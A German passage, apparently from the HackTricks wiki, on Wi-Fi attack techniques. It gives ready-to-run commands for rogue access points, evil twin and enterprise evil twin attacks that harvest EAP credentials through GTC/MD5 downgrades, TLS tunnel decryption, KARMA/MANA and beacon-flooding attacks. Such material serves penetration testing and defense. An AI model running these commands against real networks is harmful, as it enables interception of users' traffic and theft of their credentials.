- Rundsende-Sondierungsanfragen haben ein leeres SSID-Feld und werden an alle nahegelegenen APs gesendet, sodass die Station nach einem bevorzugten Netzwerk suchen kann, ohne den Inhalt ihrer PNL preiszugeben.
Einfacher AP mit Umleitung zum Internet
Bevor erklärt wird, wie komplexere Angriffe durchgeführt werden, wird erläutert, wie man einfach einen AP erstellt und dessen Datenverkehr an eine mit dem Internet verbundene Schnittstelle umleitet.
Überprüfen Sie mit ifconfig -a
, ob die WLAN-Schnittstelle zum Erstellen des AP und die mit dem Internet verbundene Schnittstelle vorhanden sind.
DHCP & DNS
apt-get install dnsmasq #Manages DHCP and DNS
Erstellen Sie die Konfigurationsdatei /etc/dnsmasq.conf
:
interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
Dann IP-Adressen und Routen setzen:
ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
Und dann starten Sie dnsmasq:
dnsmasq -C dnsmasq.conf -d
hostapd
apt-get install hostapd
Erstellen Sie eine Konfigurationsdatei hostapd.conf
:
interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1
Stoppen Sie lästige Prozesse, setzen Sie den Überwachungsmodus und starten Sie hostapd:
airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf
Weiterleitung und Umleitung
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
Böser Zwilling
Ein böser Zwilling-Angriff nutzt die Art und Weise aus, wie WiFi-Clients Netzwerke erkennen, wobei sie sich hauptsächlich auf den Netzwerknamen (ESSID) verlassen, ohne dass sich der Basisstation (Zugangspunkt) gegenüber dem Client authentifizieren muss. Die wichtigsten Punkte sind:
- Schwierigkeiten bei der Unterscheidung: Geräte haben Schwierigkeiten, zwischen legitimen und gefälschten Zugangspunkten zu unterscheiden, wenn sie denselben ESSID und denselben Verschlüsselungstyp teilen. Netzwerke in der realen Welt verwenden oft mehrere Zugangspunkte mit demselben ESSID, um die Abdeckung nahtlos zu erweitern.
- Client-Roaming und Verbindungsm manipulation: Das 802.11-Protokoll ermöglicht es Geräten, zwischen Zugangspunkten innerhalb desselben ESS zu wechseln. Angreifer können dies ausnutzen, indem sie ein Gerät dazu verleiten, sich von seinem aktuellen Basisstation zu trennen und sich mit einem gefälschten zu verbinden. Dies kann erreicht werden, indem ein stärkeres Signal angeboten wird oder die Verbindung zur legitimen Basisstation durch Methoden wie Deauthentifizierungspakete oder Jamming gestört wird.
- Herausforderungen bei der Ausführung: Das erfolgreiche Ausführen eines bösen Zwilling-Angriffs in Umgebungen mit mehreren gut platzierten Zugangspunkten kann herausfordernd sein. Das Deauthentifizieren eines einzelnen legitimen Zugangspunkts führt oft dazu, dass das Gerät sich mit einem anderen legitimen Zugangspunkt verbindet, es sei denn, der Angreifer kann alle nahegelegenen Zugangspunkte deauthentifizieren oder den gefälschten Zugangspunkt strategisch platzieren.
Sie können einen sehr einfachen Open Evil Twin erstellen (ohne die Fähigkeit, den Datenverkehr ins Internet zu leiten) durch:
airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon
Sie könnten auch einen Evil Twin mit eaphammer erstellen (beachten Sie, dass für die Erstellung von Evil Twins mit eaphammer die Schnittstelle NICHT im Monitor-Modus sein sollte):
./eaphammer -i wlan0 --essid exampleCorp --captive-portal
Oder mit Airgeddon: Optionen: 5,6,7,8,9 (im Menü für den Evil Twin-Angriff).
Bitte beachten Sie, dass standardmäßig, wenn ein ESSID in der PNL als WPA geschützt gespeichert ist, das Gerät nicht automatisch eine Verbindung zu einem offenen Evil Twin herstellt. Sie können versuchen, den echten AP zu DoS-en und hoffen, dass der Benutzer manuell eine Verbindung zu Ihrem offenen Evil Twin herstellt, oder Sie könnten den echten AP DoS-en und einen WPA Evil Twin verwenden, um den Handshake zu erfassen (mit dieser Methode können Sie das Opfer nicht dazu bringen, sich mit Ihnen zu verbinden, da Sie den PSK nicht kennen, aber Sie können den Handshake erfassen und versuchen, ihn zu knacken).
Einige Betriebssysteme und Antivirenprogramme warnen den Benutzer davor, eine Verbindung zu einem offenen Netzwerk herzustellen, da dies gefährlich ist...
WPA/WPA2 Evil Twin
Sie können einen Evil Twin mit WPA/2 erstellen und wenn die Geräte so konfiguriert sind, dass sie sich mit diesem SSID mit WPA/2 verbinden, werden sie versuchen, eine Verbindung herzustellen. Wie auch immer, um den 4-Wege-Handshake abzuschließen, müssen Sie auch das Passwort kennen, das der Client verwenden wird. Wenn Sie es nicht wissen, wird die Verbindung nicht abgeschlossen.
./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"
Unternehmens-Übelzwilling
Um diese Angriffe zu verstehen, empfehle ich, zuerst die kurze WPA Enterprise Erklärung zu lesen.
Verwendung von hostapd-wpe
hostapd-wpe
benötigt eine Konfigurationsdatei, um zu funktionieren. Um die Generierung dieser Konfigurationen zu automatisieren, könnten Sie https://github.com/WJDigby/apd_launchpad verwenden (laden Sie die Python-Datei in /etc/hostapd-wpe/ herunter).
./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s
Im Konfigurationsfile können Sie viele verschiedene Dinge auswählen, wie z.B. SSID, Kanal, Benutzerdateien, Zertifikat/Schlüssel, DH-Parameter, WPA-Version und Authentifizierung...
Verwendung von hostapd-wpe mit EAP-TLS, um jedem Zertifikat die Anmeldung zu ermöglichen.
Verwendung von EAPHammer
# Generate Certificates
./eaphammer --cert-wizard
# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds
Standardmäßig verwendet EAPHammer diese Authentifizierungsmethoden (beachten Sie GTC als erste Methode, um Klartextpasswörter zu erhalten, und dann die Verwendung robusterer Authentifizierungsmethoden):
GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5
Dies ist die Standardmethodik, um lange Verbindungsziten zu vermeiden. Sie können jedoch auch angeben, dass der Server die Authentifizierungsmethoden von schwächsten bis stärksten durchläuft:
--negotiate weakest
Oder Sie könnten auch verwenden:
--negotiate gtc-downgrade
um eine hoch effiziente GTC-Downgrade-Implementierung zu verwenden (Klartextpasswörter)--negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP
um manuell die angebotenen Methoden festzulegen (das Angebot der gleichen Authentifizierungsmethoden in der gleichen Reihenfolge wie die Organisation wird den Angriff viel schwieriger zu erkennen machen).- Weitere Informationen finden Sie im Wiki
Mit Airgeddon
Airgeddon
kann zuvor generierte Zertifikate verwenden, um EAP-Authentifizierung für WPA/WPA2-Enterprise-Netzwerke anzubieten. Das gefälschte Netzwerk wird das Verbindungsprotokoll auf EAP-MD5 herabstufen, um den Benutzer und das MD5 des Passworts zu erfassen. Später kann der Angreifer versuchen, das Passwort zu knacken.
Airggedon
bietet Ihnen die Möglichkeit eines kontinuierlichen Evil Twin-Angriffs (lautstark) oder nur den Evil Attack zu erstellen, bis sich jemand verbindet (sanft).
Debuggen von PEAP- und EAP-TTLS-TLS-Tunneln bei Evil Twins-Angriffen
Diese Methode wurde bei einer PEAP-Verbindung getestet, aber da ich einen beliebigen TLS-Tunnel entschlüssele, sollte dies auch mit EAP-TTLS funktionieren.
Im Konfigurations-Abschnitt von hostapd-wpe kommentieren Sie die Zeile, die dh_file enthält (von dh_file=/etc/hostapd-wpe/certs/dh
zu #dh_file=/etc/hostapd-wpe/certs/dh
)
Dadurch wird hostapd-wpe
dazu gebracht, Schlüssel mit RSA auszutauschen anstatt mit DH, sodass Sie den Datenverkehr später entschlüsseln können, wenn Sie den privaten Schlüssel des Servers kennen.
Starten Sie nun den Evil Twin mit hostapd-wpe
mit dieser modifizierten Konfiguration wie gewohnt. Starten Sie auch Wireshark
auf der Schnittstelle, die den Evil Twin-Angriff durchführt.
Jetzt oder später (wenn Sie bereits einige Authentifizierungsversuche erfasst haben) können Sie den privaten RSA-Schlüssel in Wireshark hinzufügen unter: Bearbeiten --> Einstellungen --> Protokolle --> TLS --> (RSA-Schlüsselliste) Bearbeiten...
Fügen Sie einen neuen Eintrag hinzu und füllen Sie das Formular mit diesen Werten aus: IP-Adresse = beliebig -- Port = 0 -- Protokoll = Daten -- Schlüsseldatei (wählen Sie Ihre Schlüsseldatei aus, um Probleme zu vermeiden, wählen Sie eine Schlüsseldatei ohne Passwortschutz).
Und schauen Sie sich den neuen "Entschlüsselte TLS" Tab an:
KARMA, MANA, Loud MANA und Known Beacons-Angriff
ESSID- und MAC-Black-/Whitelists
Verschiedene Arten von Media Access Control Filter Lists (MFACLs) und ihre entsprechenden Modi und Auswirkungen auf das Verhalten eines Rogue Access Points (AP):
- MAC-basierte Whitelist:
- Der Rogue-AP antwortet nur auf Anforderungen von Geräten, die in der Whitelist aufgeführt sind, und bleibt für alle anderen unsichtbar.
- MAC-basierte Blacklist:
- Der Rogue-AP ignoriert Anforderungen von Geräten auf der Blacklist und macht den Rogue-AP für diese spezifischen Geräte effektiv unsichtbar.
- ESSID-basierte Whitelist:
- Der Rogue-AP antwortet nur auf Anforderungen für bestimmte aufgeführte ESSIDs und bleibt für Geräte unsichtbar, deren Preferred Network Lists (PNLs) diese ESSIDs nicht enthalten.
- ESSID-basierte Blacklist:
- Der Rogue-AP antwortet nicht auf Anforderungen für die spezifischen ESSIDs in der Blacklist und bleibt für Geräte unsichtbar, die nach diesen bestimmten Netzwerken suchen.
# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*
[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]
# example ESSID-based MFACL file
name1
name2
name3
[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]
KARMA
Diese Methode ermöglicht es einem Angreifer, einen bösartigen Zugangspunkt (AP) zu erstellen, der auf alle Sondieranfragen von Geräten antwortet, die versuchen, sich mit Netzwerken zu verbinden. Diese Technik täuscht Geräte, um sich mit dem AP des Angreifers zu verbinden, indem sie die Netzwerke nachahmt, nach denen die Geräte suchen. Sobald ein Gerät eine Verbindungsanfrage an diesen Rogue-AP sendet, wird die Verbindung hergestellt, was dazu führt, dass das Gerät fälschlicherweise mit dem Netzwerk des Angreifers verbunden ist.
MANA
Dann begannen Geräte, unerwünschte Netzwerkantworten zu ignorieren, was die Wirksamkeit des ursprünglichen Karma-Angriffs verringerte. Allerdings wurde eine neue Methode, bekannt als der MANA-Angriff, von Ian de Villiers und Dominic White eingeführt. Diese Methode beinhaltet, dass der Rogue-AP die Preferred Network Lists (PNL) von Geräten erfasst, indem er auf deren Rundruf-Sondieranfragen reagiert und Netzwerknamen (SSIDs) sendet, die zuvor von den Geräten angefordert wurden. Dieser ausgeklügelte Angriff umgeht die Schutzmaßnahmen gegen den ursprünglichen Karma-Angriff, indem er ausnutzt, wie Geräte bekannte Netzwerke speichern und priorisieren.
Der MANA-Angriff funktioniert, indem er sowohl gerichtete als auch Rundruf-Sondieranfragen von Geräten überwacht. Bei gerichteten Anfragen zeichnet er die MAC-Adresse des Geräts und den angeforderten Netzwerknamen auf und fügt diese Informationen einer Liste hinzu. Wenn eine Rundrufanfrage empfangen wird, antwortet der AP mit Informationen, die zu einem der Netzwerke auf der Liste des Geräts passen, um das Gerät dazu zu verleiten, sich mit dem Rogue-AP zu verbinden.
./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]
Laute MANA
Ein Laute MANA-Angriff ist eine fortgeschrittene Strategie, wenn Geräte keine gerichteten Sondierungen verwenden oder wenn ihre bevorzugten Netzwerklisten (PNL) dem Angreifer unbekannt sind. Er basiert auf dem Prinzip, dass Geräte im selben Bereich wahrscheinlich einige Netzwerknamen in ihren PNLs teilen. Anstatt selektiv zu antworten, sendet dieser Angriff Sondierungsantworten für jeden im kombinierten PNL aller beobachteten Geräte gefundenen Netzwerknamen (ESSID) aus. Dieser breite Ansatz erhöht die Chance, dass ein Gerät ein vertrautes Netzwerk erkennt und versucht, eine Verbindung zum Rogue Access Point (AP) herzustellen.
./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]
Bekannter Beacon-Angriff
Wenn der Loud MANA-Angriff nicht ausreicht, bietet der Bekannte Beacon-Angriff einen anderen Ansatz. Diese Methode erzwingt den Verbindungsprozess, indem sie einen AP simuliert, der auf jeden Netzwerknamen antwortet, indem sie eine Liste potenzieller ESSIDs aus einer Wortliste durchläuft. Dies simuliert die Anwesenheit zahlreicher Netzwerke in der Hoffnung, eine ESSID im PNL des Opfers abzugleichen, was zu einem Verbindungsversuch mit dem gefälschten AP führt. Der Angriff kann verstärkt werden, indem er mit der Option --loud
kombiniert wird, um einen aggressiveren Versuch zu unternehmen, Geräte zu fangen.
Eaphammer implementierte diesen Angriff als MANA-Angriff, bei dem alle ESSIDs in einer Liste aufgeladen werden (Sie könnten dies auch mit --loud
kombinieren, um einen Loud MANA + Bekannte Beacons-Angriff zu erstellen):
./eaphammer -i wlan0 --mana [--loud] --known-beacons --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]
Bekannter Beacon Burst Angriff
Der bekannte Beacon Burst Angriff beinhaltet das schnelle Aussenden von Beacon-Frames für jede in einer Datei aufgelistete ESSID. Dies schafft eine dichte Umgebung aus gefälschten Netzwerken, was die Wahrscheinlichkeit erhöht, dass Geräte sich mit dem Rogue-AP verbinden, insbesondere wenn dies mit einem MANA-Angriff kombiniert wird. Diese Technik nutzt Geschwindigkeit und Menge, um die Netzwerkauswahlmechanismen der Geräte zu überlasten.
# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5
Wi-Fi Direct
Wi-Fi Direct ist ein Protokoll, das es Geräten ermöglicht, direkt miteinander über Wi-Fi zu verbinden, ohne auf einen herkömmlichen drahtlosen Zugangspunkt angewiesen zu sein. Diese Fähigkeit ist in verschiedene Internet of Things (IoT)-Geräte integriert, wie Drucker und Fernseher, und ermöglicht eine direkte Geräte-zu-Geräte-Kommunikation. Ein bemerkenswertes Merkmal von Wi-Fi Direct ist, dass ein Gerät die Rolle eines Zugangspunkts übernimmt, bekannt als der Gruppenbesitzer, um die Verbindung zu verwalten.
Die Sicherheit für Wi-Fi Direct-Verbindungen wird durch Wi-Fi Protected Setup (WPS) hergestellt, das verschiedene Methoden für sicheres Pairing unterstützt, einschließlich:
- Push-Button Configuration (PBC)
- PIN-Eingabe
- Near-Field Communication (NFC)
Diese Methoden, insbesondere die PIN-Eingabe, sind anfällig für die gleichen Schwachstellen wie WPS in herkömmlichen Wi-Fi-Netzwerken und machen sie zu Zielen für ähnliche Angriffsvektoren.
EvilDirect Hijacking
EvilDirect Hijacking ist ein Angriff, der spezifisch für Wi-Fi Direct ist. Er spiegelt das Konzept eines Evil Twin-Angriffs wider, zielt jedoch auf Wi-Fi Direct-Verbindungen ab. In diesem Szenario gibt sich ein Angreifer als legitimer Gruppenbesitzer aus, mit dem Ziel, Geräte dazu zu bringen, sich mit einer bösartigen Entität zu verbinden. Diese Methode kann mithilfe von Tools wie airbase-ng
ausgeführt werden, indem der Kanal, die ESSID und die MAC-Adresse des imitierten Geräts angegeben werden:
Referenzen
- https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
- https://posts.specterops.io/modern-wireless-attacks-pt-ii-mana-and-known-beacon-attacks-97a359d385f9
- https://posts.specterops.io/modern-wireless-tradecraft-pt-iii-management-frame-access-control-lists-mfacls-22ca7f314a38
- https://posts.specterops.io/modern-wireless-tradecraft-pt-iv-tradecraft-and-detection-d1a95da4bb4d
- https://github.com/gdssecurity/Whitepapers/blob/master/GDS%20Labs%20-%20Identifying%20Rogue%20Access%20Point%20Attacks%20Using%20Probe%20Response%20Patterns%20and%20Signal%20Strength.pdf
- http://solstice.sh/wireless/eaphammer/2019/09/10/eap-downgrade-attacks/
- https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/
- https://medium.com/hacking-info-sec/ataque-clientless-a-wpa-wpa2-usando-pmkid-1147d72f464d
- https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)
- https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/
TODO: Werfen Sie einen Blick auf https://github.com/wifiphisher/wifiphisher (Anmeldung mit Facebook und Nachahmung von WPA in Captive Portals)
Treten Sie dem HackenProof Discord Server bei, um mit erfahrenen Hackern und Bug-Bounty-Jägern zu kommunizieren!
Hacking Insights
Beschäftigen Sie sich mit Inhalten, die sich mit dem Nervenkitzel und den Herausforderungen des Hackens befassen
Echtzeit-Hack-News
Bleiben Sie mit der schnelllebigen Welt des Hackens durch Echtzeitnachrichten und Einblicke auf dem Laufenden
Neueste Ankündigungen
Bleiben Sie über die neuesten Bug-Bounties und wichtige Plattformupdates informiert
Treten Sie uns bei Discord bei und beginnen Sie noch heute mit Top-Hackern zusammenzuarbeiten!
Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!
Andere Möglichkeiten, HackTricks zu unterstützen:
- Wenn Sie Ihr Unternehmen in HackTricks beworben sehen möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
- Holen Sie sich das offizielle PEASS & HackTricks-Merch
- Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositories einreichen.